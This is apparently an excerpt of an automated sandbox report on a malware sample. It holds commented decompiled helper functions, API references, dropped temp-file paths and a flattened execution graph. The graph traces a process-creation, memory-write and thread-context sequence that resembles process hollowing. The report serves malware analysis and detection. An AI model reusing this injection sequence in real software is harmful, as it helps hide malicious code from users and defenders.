                                          						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
                                          							_push(_t16);
                                          							_push(6);
                                          							 *0x7a1f74 = _t16;
                                          							E00405005();
                                          						}
                                          						L11:
                                          						// Forward everything to the original window procedure
                                          						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
                                          					}
                                          					// WM_MOUSEMOVE on a hidden window: pass through unchanged
                                          					if(IsWindowVisible(_a4) == 0) {
                                          						L10:
                                          						_t16 = _a16;
                                          						goto L11;
                                          					}
                                          					// WM_MOUSEMOVE on a visible window is rewritten into a WM_USER+0x19 message
                                          					_t16 = E00404F85(_a4, 1);
                                          					_t15 = 0x419;
                                          					goto L7;
                                          				}
                                          				// WM_CHAR: only the space key (0x20) is handled, by sending WM_USER+0x13
                                          				if(_a12 != 0x20) {
                                          					goto L10;
                                          				}
                                          				E00404616(0x413);
                                          				return 0;
                                          			}






                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00405673
                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                                            • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                          • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                                          • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                          • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			// Decompiled registry string read. E004064DB opens the key with access 0x20019 (KEY_READ),
                                          			// adding 0x100 (KEY_WOW64_64KEY) when bit 8 of _a20 is clear; the opened HKEY is
                                          			// returned through &_a20. The value _a12 is read into the 0x800-byte buffer _a16 and is
                                          			// accepted only when its type is REG_SZ (1) or REG_EXPAND_SZ (2); otherwise the buffer
                                          			// is emptied.
                                          			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                          				int _v8;
                                          				long _t21;
                                          				long _t24;
                                          				char* _t30;
                                          
                                          				asm("sbb eax, eax");
                                          				_v8 = 0x800;
                                          				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                          				_t30 = _a16;
                                          				if(_t21 != 0) {
                                          					L4:
                                          					// Open or query failed, or the value type is not a string: return an empty string
                                          					 *_t30 =  *_t30 & 0x00000000;
                                          				} else {
                                          					// _a8 receives the value type; _v8 is the buffer size in bytes
                                          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                          					_t21 = RegCloseKey(_a20);
                                          					// Force termination of the last wide character in the 0x800-byte buffer
                                          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                          						goto L4;
                                          					}
                                          				}
                                          				return _t21;
                                          			}








                                          APIs
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406582
                                          • RegCloseKey.ADVAPI32(?), ref: 0040658D
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya, xrefs: 00406543
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                          • API String ID: 3356406503-3751928542
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Decompiled case-insensitive substring search: returns a pointer to the first
                                                    			// position in _a4 at which _a8 matches under lstrcmpiA, or 0 when there is none.
                                          			// For each candidate position a NUL is written at needle length so that lstrcmpiA
                                          			// compares only that window; the decompiler renders the save/restore of that byte
                                          			// as the two assignments around the comparison.
                                          			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                          				int _v8;
                                          				int _t12;
                                          				int _t14;
                                          				int _t15;
                                          				CHAR* _t17;
                                          				CHAR* _t27;
                                          
                                          				_t12 = lstrlenA(_a8);
                                          				_t27 = _a4;
                                          				_v8 = _t12;
                                          				// Stop once the remaining haystack is shorter than the needle
                                          				while(lstrlenA(_t27) >= _v8) {
                                          					_t14 = _v8;
                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                          					_t15 = lstrcmpiA(_t27, _a8);
                                          					_t27[_v8] =  *(_t14 + _t27);
                                          					if(_t15 == 0) {
                                          						_t17 = _t27;
                                          					} else {
                                          						// No match here: advance one (possibly multi-byte) character
                                          						_t27 = CharNextA(_t27);
                                          						continue;
                                          					}
                                          					L5:
                                          					return _t17;
                                          				}
                                          				_t17 = 0;
                                          				goto L5;
                                          			}










                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                                          • CharNextA.USER32(00000000), ref: 004060FC
                                          • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                          • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                          • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:11.5%
                                          Dynamic/Decrypted Code Coverage:5.3%
                                          Signature Coverage:8.9%
                                          Total number of Nodes:1733
                                          Total number of Limit Nodes:108
f21e89 _memcpy_s 9 API calls 8440->8443 8441->8440 8444 f2af38 8442->8444 8445 f2aee3 8443->8445 8444->8445 8446 f2ad4d __cftoe2_l 58 API calls 8444->8446 8447 f25770 __crtLCMapStringA_stat 6 API calls 8445->8447 8446->8445 8448 f2af68 8447->8448 8448->8330 8450 f2ae9e __cftoe_l 58 API calls 8449->8450 8451 f2ad48 8450->8451 8451->8349 7719 160809 7731 1606f7 GetPEB 7719->7731 7721 16086e 7722 16098e CreateFileW 7721->7722 7723 1609b5 7722->7723 7724 1609b3 7722->7724 7723->7724 7725 1609c8 VirtualAlloc 7723->7725 7725->7724 7726 1609e2 ReadFile 7725->7726 7726->7724 7727 1609fa CloseHandle 7726->7727 7728 160a0b 7727->7728 7732 160cdb 7728->7732 7731->7721 7746 1606f7 GetPEB 7732->7746 7734 160d32 7735 160e1d 7734->7735 7737 160e2a 7734->7737 7745 160a16 ExitProcess 7734->7745 7747 161001 7735->7747 7737->7745 7768 160261 7737->7768 7739 160f9d 7742 160261 11 API calls 7739->7742 7740 160f30 7740->7739 7741 160261 11 API calls 7740->7741 7740->7745 7741->7740 7743 160fbc 7742->7743 7743->7745 7777 1601b2 7743->7777 7746->7734 7786 1606f7 GetPEB 7747->7786 7749 16100f 7750 16113d CreateProcessW 7749->7750 7767 161118 7749->7767 7751 161154 7750->7751 7750->7767 7752 161177 ReadProcessMemory 7751->7752 7751->7767 7753 16119b 7752->7753 7752->7767 7754 1611ce VirtualAllocEx 7753->7754 7787 160360 7753->7787 7755 1611f8 7754->7755 7754->7767 7757 160261 11 API calls 7755->7757 7759 16120e 7757->7759 7758 1611c2 7758->7754 7758->7767 7760 161268 7759->7760 7761 160261 11 API calls 7759->7761 7759->7767 7762 160261 11 API calls 7760->7762 7761->7759 7763 161282 7762->7763 7764 16128b Wow64SetThreadContext 7763->7764 7763->7767 7765 1612b0 7764->7765 7764->7767 7766 1601b2 11 API calls 7765->7766 7766->7767 7767->7745 7769 16027c 7768->7769 7770 160736 GetPEB 7769->7770 7771 16029d 7770->7771 7772 1602a5 7771->7772 7773 16032f 7771->7773 7775 1603f8 10 API calls 7772->7775 7821 16017c 7773->7821 7776 160316 7775->7776 7776->7740 7778 1601cd 7777->7778 7779 160736 GetPEB 
7778->7779 7780 1601ee 7779->7780 7781 1601f2 7780->7781 7782 160238 7780->7782 7783 1603f8 10 API calls 7781->7783 7824 16018e 7782->7824 7785 16022d 7783->7785 7785->7745 7786->7749 7788 160373 7787->7788 7796 160736 GetPEB 7788->7796 7790 160394 7791 1603de 7790->7791 7792 160398 7790->7792 7812 1601a0 7791->7812 7798 1603f8 GetPEB 7792->7798 7795 1603d3 7795->7758 7797 160759 7796->7797 7797->7790 7799 16045d 7798->7799 7815 160772 GetPEB 7799->7815 7802 1604e9 7803 1604f9 VirtualAlloc 7802->7803 7804 1605c2 7802->7804 7803->7804 7805 16050f ReadFile 7803->7805 7806 160614 7804->7806 7807 160609 VirtualFree 7804->7807 7805->7804 7808 160524 VirtualAlloc 7805->7808 7806->7795 7807->7806 7808->7804 7809 160547 7808->7809 7809->7804 7810 1605b1 VirtualFree 7809->7810 7811 1605ad CloseHandle 7809->7811 7810->7804 7811->7810 7813 1603f8 10 API calls 7812->7813 7814 1601aa 7813->7814 7814->7795 7816 160785 7815->7816 7818 1604da CreateFileW 7816->7818 7819 16061d GetPEB 7816->7819 7818->7802 7818->7804 7820 16064d 7819->7820 7820->7816 7822 1603f8 10 API calls 7821->7822 7823 160186 7822->7823 7823->7776 7825 1603f8 10 API calls 7824->7825 7826 160198 7825->7826 7826->7785 7914 f216d3 7917 f2344b 7914->7917 7918 f236f3 __getptd_noexit 58 API calls 7917->7918 7919 f216e4 7918->7919 7920 f293d0 7921 f293e6 7920->7921 7922 f293da 7920->7922 7922->7921 7923 f293df CloseHandle 7922->7923 7923->7921 8452 f22690 8453 f226a2 8452->8453 8455 f226b0 @_EH4_CallFilterFunc@8 8452->8455 8454 f25770 __crtLCMapStringA_stat 6 API calls 8453->8454 8454->8455 7924 f24bdf 7927 f24fc3 7924->7927 7926 f24bee 7928 f24fcf __wsopen_helper 7927->7928 7929 f236db __setmbcp 58 API calls 7928->7929 7930 f24fd7 7929->7930 7931 f24f1d __setmbcp 58 API calls 7930->7931 7932 f24fe1 7931->7932 7952 f24cbe 7932->7952 7935 f248b1 __malloc_crt 58 API calls 7936 f25003 7935->7936 7937 f25130 __wsopen_helper 7936->7937 7959 f2516b 7936->7959 7937->7926 7940 f25140 7940->7937 7943 f25153 7940->7943 7945 
f24831 _free 58 API calls 7940->7945 7941 f25039 7942 f25059 7941->7942 7944 f24831 _free 58 API calls 7941->7944 7942->7937 7947 f2442f __lock 58 API calls 7942->7947 7946 f21cc3 _memcpy_s 58 API calls 7943->7946 7944->7942 7945->7943 7946->7937 7949 f25088 7947->7949 7948 f25116 7969 f25135 7948->7969 7949->7948 7951 f24831 _free 58 API calls 7949->7951 7951->7948 7953 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7952->7953 7954 f24cce 7953->7954 7955 f24cef 7954->7955 7956 f24cdd GetOEMCP 7954->7956 7957 f24d06 7955->7957 7958 f24cf4 GetACP 7955->7958 7956->7957 7957->7935 7957->7937 7958->7957 7960 f24cbe getSystemCP 60 API calls 7959->7960 7961 f25188 7960->7961 7964 f251d9 IsValidCodePage 7961->7964 7966 f2518f setSBCS 7961->7966 7968 f251fe _memset __setmbcp_nolock 7961->7968 7962 f25770 __crtLCMapStringA_stat 6 API calls 7963 f2502a 7962->7963 7963->7940 7963->7941 7965 f251eb GetCPInfo 7964->7965 7964->7966 7965->7966 7965->7968 7966->7962 7972 f24d8b GetCPInfo 7968->7972 8038 f24599 LeaveCriticalSection 7969->8038 7971 f2513c 7971->7937 7978 f24dc3 7972->7978 7981 f24e6d 7972->7981 7974 f25770 __crtLCMapStringA_stat 6 API calls 7977 f24f19 7974->7977 7977->7966 7982 f27a55 7978->7982 7980 f27917 ___crtLCMapStringA 62 API calls 7980->7981 7981->7974 7983 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7982->7983 7984 f27a66 7983->7984 7992 f2795d 7984->7992 7987 f27917 7988 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7987->7988 7989 f27928 7988->7989 8009 f27713 7989->8009 7993 f27977 7992->7993 7994 f27984 MultiByteToWideChar 7992->7994 7993->7994 7995 f279b0 7994->7995 8004 f279a9 7994->8004 7998 f2114b _malloc 58 API calls 7995->7998 8002 f279d2 _memset __crtLCMapStringA_stat 7995->8002 7996 f25770 __crtLCMapStringA_stat 6 API calls 7997 f24e24 7996->7997 7997->7987 7998->8002 7999 f27a0e MultiByteToWideChar 8000 f27a38 7999->8000 8001 f27a28 GetStringTypeW 7999->8001 8005 f275c3 8000->8005 8001->8000 8002->7999 8002->8004 8004->7996 8006 
f275de 8005->8006 8007 f275cd 8005->8007 8006->8004 8007->8006 8008 f24831 _free 58 API calls 8007->8008 8008->8006 8011 f2772c MultiByteToWideChar 8009->8011 8012 f2778b 8011->8012 8016 f27792 8011->8016 8013 f25770 __crtLCMapStringA_stat 6 API calls 8012->8013 8014 f24e45 8013->8014 8014->7980 8015 f277f1 MultiByteToWideChar 8017 f2780a 8015->8017 8033 f27858 8015->8033 8018 f2114b _malloc 58 API calls 8016->8018 8021 f277ba __crtLCMapStringA_stat 8016->8021 8034 f27659 8017->8034 8018->8021 8020 f275c3 __crtLCMapStringA_stat 58 API calls 8020->8012 8021->8012 8021->8015 8022 f2781e 8023 f27834 8022->8023 8025 f27860 8022->8025 8022->8033 8024 f27659 __crtLCMapStringA_stat LCMapStringW 8023->8024 8023->8033 8024->8033 8027 f27888 __crtLCMapStringA_stat 8025->8027 8028 f2114b _malloc 58 API calls 8025->8028 8026 f27659 __crtLCMapStringA_stat LCMapStringW 8030 f278cb 8026->8030 8027->8026 8027->8033 8028->8027 8029 f278f3 8031 f275c3 __crtLCMapStringA_stat 58 API calls 8029->8031 8030->8029 8032 f278e5 WideCharToMultiByte 8030->8032 8031->8033 8032->8029 8033->8020 8035 f27684 __crtLCMapStringA_stat 8034->8035 8036 f27669 8034->8036 8037 f2769b LCMapStringW 8035->8037 8036->8022 8037->8022 8038->7971 8466 f23283 IsProcessorFeaturePresent 8467 f232a9 8466->8467 8468 f2b303 8471 f2b314 8468->8471 8472 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8471->8472 8473 f2b326 8472->8473 8480 f2b791 8473->8480 8475 f2b346 8477 f2b791 __forcdecpt_l 65 API calls 8475->8477 8479 f2b310 8477->8479 8478 f2b332 8478->8475 8485 f2b623 8478->8485 8481 f2b7af 8480->8481 8482 f2b79d 8480->8482 8490 f2b64e 8481->8490 8482->8478 8486 f2b640 8485->8486 8487 f2b62f 8485->8487 8512 f2b5d1 8486->8512 8487->8478 8491 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8490->8491 8492 f2b661 8491->8492 8493 f2b6cd 8492->8493 8494 f2b66d 8492->8494 8499 f2b6eb 8493->8499 8509 f2917b 8493->8509 8501 f2b682 8494->8501 8502 f2c30c 8494->8502 8496 f21cc3 _memcpy_s 58 API calls 8498 f2b6f1 
8496->8498 8500 f27917 ___crtLCMapStringA 62 API calls 8498->8500 8499->8496 8499->8498 8500->8501 8501->8478 8503 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8502->8503 8504 f2c31e 8503->8504 8505 f2c32b 8504->8505 8506 f2917b __isleadbyte_l 58 API calls 8504->8506 8505->8501 8507 f2c34f 8506->8507 8508 f27a55 ___crtGetStringTypeA 61 API calls 8507->8508 8508->8505 8510 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8509->8510 8511 f2918c 8510->8511 8511->8499 8513 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8512->8513 8514 f2b5e2 8513->8514 8515 f2c30c __isctype_l 61 API calls 8514->8515 8516 f2b5f9 8514->8516 8515->8516 8516->8478 6474 f215c0 6475 f215cc __wsopen_helper 6474->6475 6511 f2407f GetStartupInfoW 6475->6511 6477 f215d1 6513 f21d17 GetProcessHeap 6477->6513 6479 f21629 6480 f21634 6479->6480 6593 f21710 6479->6593 6514 f23815 6480->6514 6483 f2163a 6484 f21645 __RTC_Initialize 6483->6484 6485 f21710 _fast_error_exit 58 API calls 6483->6485 6535 f238a8 6484->6535 6485->6484 6487 f21654 6488 f21660 GetCommandLineW 6487->6488 6489 f21710 _fast_error_exit 58 API calls 6487->6489 6554 f23fa4 GetEnvironmentStringsW 6488->6554 6491 f2165f 6489->6491 6491->6488 6494 f2167a 6495 f21685 6494->6495 6601 f217be 6494->6601 6564 f23d99 6495->6564 6498 f2168b 6499 f21696 6498->6499 6501 f217be __lock 58 API calls 6498->6501 6578 f217f8 6499->6578 6501->6499 6502 f2169e 6503 f216a9 __wwincmdln 6502->6503 6504 f217be __lock 58 API calls 6502->6504 6584 f21000 6503->6584 6504->6503 6507 f216cc 6611 f217e9 6507->6611 6510 f216d1 __wsopen_helper 6512 f24095 6511->6512 6512->6477 6513->6479 6614 f21890 RtlEncodePointer 6514->6614 6516 f2381a 6620 f24560 6516->6620 6519 f23823 6624 f2388b 6519->6624 6524 f23840 6636 f24869 6524->6636 6526 f23882 6528 f2388b __mtterm 61 API calls 6526->6528 6531 f23887 6528->6531 6530 f23861 6530->6526 6532 f23867 6530->6532 6531->6483 6645 f23762 6532->6645 6534 f2386f GetCurrentThreadId 6534->6483 6536 f238b4 __wsopen_helper 
6535->6536 6537 f2442f __lock 58 API calls 6536->6537 6538 f238bb 6537->6538 6539 f24869 __calloc_crt 58 API calls 6538->6539 6540 f238cc 6539->6540 6541 f23937 GetStartupInfoW 6540->6541 6542 f238d7 __wsopen_helper @_EH4_CallFilterFunc@8 6540->6542 6544 f23a7b 6541->6544 6547 f2394c 6541->6547 6542->6487 6543 f23b43 6909 f23b53 6543->6909 6544->6543 6549 f23ac8 GetStdHandle 6544->6549 6550 f23adb GetFileType 6544->6550 6553 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6544->6553 6546 f2399a 6546->6544 6551 f239ce GetFileType 6546->6551 6552 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6546->6552 6547->6544 6547->6546 6548 f24869 __calloc_crt 58 API calls 6547->6548 6548->6547 6549->6544 6550->6544 6551->6546 6552->6546 6553->6544 6555 f23fb5 6554->6555 6556 f21670 6554->6556 6557 f248b1 __malloc_crt 58 API calls 6555->6557 6560 f23b5c GetModuleFileNameW 6556->6560 6558 f23fdb _memmove 6557->6558 6559 f23ff1 FreeEnvironmentStringsW 6558->6559 6559->6556 6561 f23b90 _wparse_cmdline 6560->6561 6562 f248b1 __malloc_crt 58 API calls 6561->6562 6563 f23bd0 _wparse_cmdline 6561->6563 6562->6563 6563->6494 6565 f23db2 __wsetenvp 6564->6565 6566 f23daa 6564->6566 6567 f24869 __calloc_crt 58 API calls 6565->6567 6566->6498 6568 f23ddb __wsetenvp 6567->6568 6568->6566 6570 f23e32 6568->6570 6571 f24869 __calloc_crt 58 API calls 6568->6571 6572 f23e57 6568->6572 6574 f25457 __wsetenvp 58 API calls 6568->6574 6575 f23e6e 6568->6575 6569 f24831 _free 58 API calls 6569->6566 6570->6569 6571->6568 6573 f24831 _free 58 API calls 6572->6573 6573->6566 6574->6568 6576 f21e99 __invoke_watson 8 API calls 6575->6576 6577 f23e7a 6576->6577 6577->6498 6579 f21804 __IsNonwritableInCurrentImage 6578->6579 6913 f24942 6579->6913 6581 f21822 __initterm_e 6583 f21841 _doexit __IsNonwritableInCurrentImage 6581->6583 6916 f2481c 6581->6916 6583->6502 6585 f2114b _malloc 58 API calls 6584->6585 6586 f21013 6585->6586 6982 f211dd 6586->6982 6590 f21088 6590->6507 
6608 f21a61 6590->6608 6591 f2104d _memset 6591->6590 6592 f2107f EnumSystemCodePagesW 6591->6592 6592->6590 6594 f21721 6593->6594 6595 f2171c 6593->6595 6597 f21ad2 __NMSG_WRITE 58 API calls 6594->6597 6596 f21a75 __FF_MSGBANNER 58 API calls 6595->6596 6596->6594 6598 f21729 6597->6598 6599 f217a8 _fast_error_exit 3 API calls 6598->6599 6600 f21733 6599->6600 6600->6480 6602 f21a75 __FF_MSGBANNER 58 API calls 6601->6602 6603 f217c6 6602->6603 6604 f21ad2 __NMSG_WRITE 58 API calls 6603->6604 6605 f217ce 6604->6605 7689 f2187c 6605->7689 6609 f21932 _doexit 58 API calls 6608->6609 6610 f21a70 6609->6610 6610->6507 6612 f21932 _doexit 58 API calls 6611->6612 6613 f217f4 6612->6613 6613->6510 6655 f21767 6614->6655 6616 f218a1 __init_pointers __initp_misc_winsig 6656 f24995 EncodePointer 6616->6656 6618 f218b9 __init_pointers 6619 f24110 34 API calls 6618->6619 6619->6516 6621 f2456c 6620->6621 6623 f2381f 6621->6623 6657 f240a2 6621->6657 6623->6519 6633 f24001 6623->6633 6625 f23895 6624->6625 6627 f2389b 6624->6627 6660 f2401f 6625->6660 6628 f24479 DeleteCriticalSection 6627->6628 6629 f24495 6627->6629 6663 f24831 6628->6663 6631 f244a1 DeleteCriticalSection 6629->6631 6632 f23828 6629->6632 6631->6629 6632->6483 6634 f24018 TlsAlloc 6633->6634 6635 f23835 6633->6635 6635->6519 6635->6524 6638 f24870 6636->6638 6639 f2384d 6638->6639 6641 f2488e 6638->6641 6689 f274fd 6638->6689 6639->6526 6642 f2405d 6639->6642 6641->6638 6641->6639 6697 f243a9 Sleep 6641->6697 6643 f24073 6642->6643 6644 f24077 TlsSetValue 6642->6644 6643->6530 6644->6530 6646 f2376e __wsopen_helper 6645->6646 6700 f2442f 6646->6700 6648 f237ab 6707 f23803 6648->6707 6651 f2442f __lock 58 API calls 6652 f237cc ___addlocaleref 6651->6652 6710 f2380c 6652->6710 6654 f237f7 __wsopen_helper 6654->6534 6655->6616 6656->6618 6658 f240b2 6657->6658 6659 f240bf InitializeCriticalSectionAndSpinCount 6657->6659 6658->6621 6659->6621 6661 f24032 6660->6661 6662 f24036 TlsFree 6660->6662 6661->6627 
6662->6627 6664 f2483a HeapFree 6663->6664 6668 f24863 __dosmaperr 6663->6668 6665 f2484f 6664->6665 6664->6668 6669 f21cc3 6665->6669 6668->6627 6672 f236f3 GetLastError 6669->6672 6671 f21cc8 GetLastError 6671->6668 6686 f2403e 6672->6686 6674 f23708 6675 f23756 SetLastError 6674->6675 6676 f24869 __calloc_crt 55 API calls 6674->6676 6675->6671 6677 f2371b 6676->6677 6677->6675 6678 f2405d __getptd_noexit TlsSetValue 6677->6678 6679 f2372f 6678->6679 6680 f23735 6679->6680 6681 f2374d 6679->6681 6682 f23762 __initptd 55 API calls 6680->6682 6683 f24831 _free 55 API calls 6681->6683 6685 f2373d GetCurrentThreadId 6682->6685 6684 f23753 6683->6684 6684->6675 6685->6675 6687 f24051 6686->6687 6688 f24055 TlsGetValue 6686->6688 6687->6674 6688->6674 6690 f27508 6689->6690 6694 f27523 6689->6694 6691 f27514 6690->6691 6690->6694 6692 f21cc3 _memcpy_s 57 API calls 6691->6692 6695 f27519 6692->6695 6693 f27533 HeapAlloc 6693->6694 6693->6695 6694->6693 6694->6695 6698 f21741 DecodePointer 6694->6698 6695->6638 6697->6641 6699 f21754 6698->6699 6699->6694 6701 f24453 EnterCriticalSection 6700->6701 6702 f24440 6700->6702 6701->6648 6713 f244b7 6702->6713 6704 f24446 6704->6701 6705 f217be __lock 57 API calls 6704->6705 6706 f24452 6705->6706 6706->6701 6907 f24599 LeaveCriticalSection 6707->6907 6709 f237c5 6709->6651 6908 f24599 LeaveCriticalSection 6710->6908 6712 f23813 6712->6654 6714 f244c3 __wsopen_helper 6713->6714 6715 f244e4 6714->6715 6716 f244cc 6714->6716 6724 f24505 __wsopen_helper 6715->6724 6779 f248b1 6715->6779 6737 f21a75 6716->6737 6722 f24500 6727 f21cc3 _memcpy_s 58 API calls 6722->6727 6723 f2450f 6728 f2442f __lock 58 API calls 6723->6728 6724->6704 6727->6724 6730 f24516 6728->6730 6731 f24523 6730->6731 6732 f2453b 6730->6732 6734 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6731->6734 6733 f24831 _free 58 API calls 6732->6733 6735 f2452f 6733->6735 6734->6735 6785 f24557 6735->6785 6788 f23e88 6737->6788 6739 f21a7c 6740 f21a89 
6739->6740 6741 f23e88 __FF_MSGBANNER 58 API calls 6739->6741 6742 f21ad2 __NMSG_WRITE 58 API calls 6740->6742 6744 f21aab 6740->6744 6741->6740 6743 f21aa1 6742->6743 6745 f21ad2 __NMSG_WRITE 58 API calls 6743->6745 6746 f21ad2 6744->6746 6745->6744 6747 f21af0 __NMSG_WRITE 6746->6747 6749 f23e88 __FF_MSGBANNER 55 API calls 6747->6749 6775 f21c17 6747->6775 6751 f21b03 6749->6751 6750 f21c80 6776 f217a8 6750->6776 6752 f21c1c GetStdHandle 6751->6752 6753 f23e88 __FF_MSGBANNER 55 API calls 6751->6753 6756 f21c2a _strlen 6752->6756 6752->6775 6754 f21b14 6753->6754 6754->6752 6755 f21b26 6754->6755 6755->6775 6818 f25457 6755->6818 6759 f21c63 WriteFile 6756->6759 6756->6775 6759->6775 6760 f21b53 GetModuleFileNameW 6762 f21b73 6760->6762 6768 f21b83 __wsetenvp 6760->6768 6761 f21c84 6763 f21e99 __invoke_watson 8 API calls 6761->6763 6764 f25457 __wsetenvp 55 API calls 6762->6764 6765 f21c8e 6763->6765 6764->6768 6768->6761 6771 f21bc9 6768->6771 6827 f254cc 6768->6827 6770 f253eb __NMSG_WRITE 55 API calls 6772 f21c00 6770->6772 6771->6761 6836 f253eb 6771->6836 6772->6761 6773 f21c07 6772->6773 6845 f2558a EncodePointer 6773->6845 6870 f25770 6775->6870 6885 f21774 GetModuleHandleExW 6776->6885 6780 f248bf 6779->6780 6782 f244f9 6780->6782 6784 f248d2 6780->6784 6888 f2114b 6780->6888 6782->6722 6782->6723 6784->6780 6784->6782 6905 f243a9 Sleep 6784->6905 6906 f24599 LeaveCriticalSection 6785->6906 6787 f2455e 6787->6724 6789 f23e92 6788->6789 6790 f21cc3 _memcpy_s 58 API calls 6789->6790 6791 f23e9c 6789->6791 6792 f23eb8 6790->6792 6791->6739 6795 f21e89 6792->6795 6798 f21e5e DecodePointer 6795->6798 6799 f21e71 6798->6799 6804 f21e99 IsProcessorFeaturePresent 6799->6804 6802 f21e5e _memcpy_s 8 API calls 6803 f21e95 6802->6803 6803->6739 6805 f21ea4 6804->6805 6810 f21d2c 6805->6810 6809 f21e88 6809->6802 6811 f21d46 _memset __call_reportfault 6810->6811 6812 f21d66 IsDebuggerPresent 6811->6812 6813 f243cc __call_reportfault SetUnhandledExceptionFilter 
UnhandledExceptionFilter 6812->6813 6815 f21e2a __call_reportfault 6813->6815 6814 f25770 __crtLCMapStringA_stat 6 API calls 6816 f21e4d 6814->6816 6815->6814 6817 f243b7 GetCurrentProcess TerminateProcess 6816->6817 6817->6809 6819 f25470 6818->6819 6820 f25462 6818->6820 6821 f21cc3 _memcpy_s 58 API calls 6819->6821 6820->6819 6825 f25489 6820->6825 6822 f2547a 6821->6822 6823 f21e89 _memcpy_s 9 API calls 6822->6823 6824 f21b46 6823->6824 6824->6760 6824->6761 6825->6824 6826 f21cc3 _memcpy_s 58 API calls 6825->6826 6826->6822 6831 f254da 6827->6831 6828 f254de 6829 f21cc3 _memcpy_s 58 API calls 6828->6829 6830 f254e3 6828->6830 6835 f2550e 6829->6835 6830->6771 6831->6828 6831->6830 6833 f2551d 6831->6833 6832 f21e89 _memcpy_s 9 API calls 6832->6830 6833->6830 6834 f21cc3 _memcpy_s 58 API calls 6833->6834 6834->6835 6835->6832 6837 f25405 6836->6837 6839 f253f7 6836->6839 6838 f21cc3 _memcpy_s 58 API calls 6837->6838 6844 f2540f 6838->6844 6839->6837 6842 f25431 6839->6842 6840 f21e89 _memcpy_s 9 API calls 6841 f21be9 6840->6841 6841->6761 6841->6770 6842->6841 6843 f21cc3 _memcpy_s 58 API calls 6842->6843 6843->6844 6844->6840 6846 f255be 